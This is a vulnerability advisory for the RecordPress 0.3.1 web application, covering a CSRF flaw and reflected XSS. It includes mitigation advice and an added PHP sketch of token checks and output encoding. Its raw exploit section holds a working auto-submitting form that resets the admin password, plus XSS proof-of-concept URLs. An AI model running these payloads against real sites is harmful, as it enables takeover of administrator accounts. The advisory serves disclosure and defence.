Vendor: RecordPress
By: Khashayar Fereidani
CVSS: 5.5 (MEDIUM)
CSRF ( Change Admin Password ) And XSS
CWE: 352, 79
Product Name: RecordPress
Affected Version From: 2000.3.1
Affected Version To: 2000.3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:recordpress:recordpress:0.3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

WebApplication : RecordPress 0.3.1

A CSRF vulnerability exists in RecordPress 0.3.1 which allows an attacker to change the admin password. An XSS vulnerability also exists which allows an attacker to inject malicious JavaScript code into the application.

Mitigation:

Implementing a CSRF token in the application and validating it on the server side can help mitigate this vulnerability. Additionally, input validation should be implemented to prevent XSS attacks.
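
The mitigation described above, sketched in PHP as an added example (not RecordPress code and not part of the original advisory). The helper names `csrf_token`, `csrf_valid`, `h` and `may_update_user` and the `csrf_token` field are hypothetical; `sess_user` and the `form*` field names are taken from the advisory, and the sample request data is constructed.

```php
<?php
declare(strict_types=1);
// Added example: helper names are hypothetical, not RecordPress code.

// Issue one random token per session; embed it as a hidden field in the edit form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Constant-time comparison of the submitted token against the session copy.
function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($supplied)
        && $expected !== '' && hash_equals($expected, $supplied);
}

// Encode a value for HTML text or attribute context at the point of output.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Gate for a state-changing request such as the user-edit handler.
function may_update_user(string $method, array $session, array $post): bool
{
    return $method === 'POST'
        && !empty($session['sess_user'])   // authenticated; key name as seen in the advisory
        && csrf_valid($session, $post);
}

// Constructed demonstration data.
$session = ['sess_user' => 'admin'];
$token   = csrf_token($session);

// A cross-site auto-submitted form cannot know the session's token.
$forged = ['formusername' => 'admin', 'formpass' => 'x', 'formpass2' => 'x'];
// The application's own form carries the token as a hidden field.
$legit  = $forged + ['csrf_token' => $token];

var_dump(may_update_user('POST', $session, $forged));
var_dump(may_update_user('POST', $session, $legit));
echo h('<script>alert(123)</script>'), PHP_EOL;
```

Neither control helps if request parameters can overwrite `$row` or `$_SESSION`, which the parameter names in the two XSS URLs suggest; those variables must be populated server-side only.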

Exploit-DB raw data:

----------------------------------------------------------------
WebApplication : RecordPress 0.3.1
Type of vulnerability : CSRF ( Change Admin Password ) And XSS
Risk of use : Medium
----------------------------------------------------------------
Producer Website : http://www.recordpress.org/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
Facebook : http://facebook.com/fereidani
----------------------------------------------------------------

CSRF For Change Admin Password :

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://examplesite/admin/rp-settings-users-edit-db.php?id=1";

method="POST" name="form">

<input type="hidden" name="formusername" value="admin">

<input type="hidden" name="formname" value="admin">

<input type="hidden" name="formemail" value="email@pwnedpwnedpwned.sss">

<input type="hidden" name="formpass" value="password">

<input type="hidden" name="formpass2" value="password">

<input type="hidden" name="formadminstatus" value="2">

<input type="hidden" name="rp-settings-users-edit-db" value="Confirm+%BB">


</form>
</body>
</html>

------------------------------------------------

Cross Site Scripting Vulnerabilities :

http://examplesite/header.php?row[titledesc]=<script>alert(123)</script>
http://examplesite/admin/rp-menu.php?_SESSION[sess_user]=<script>alert(123)</script>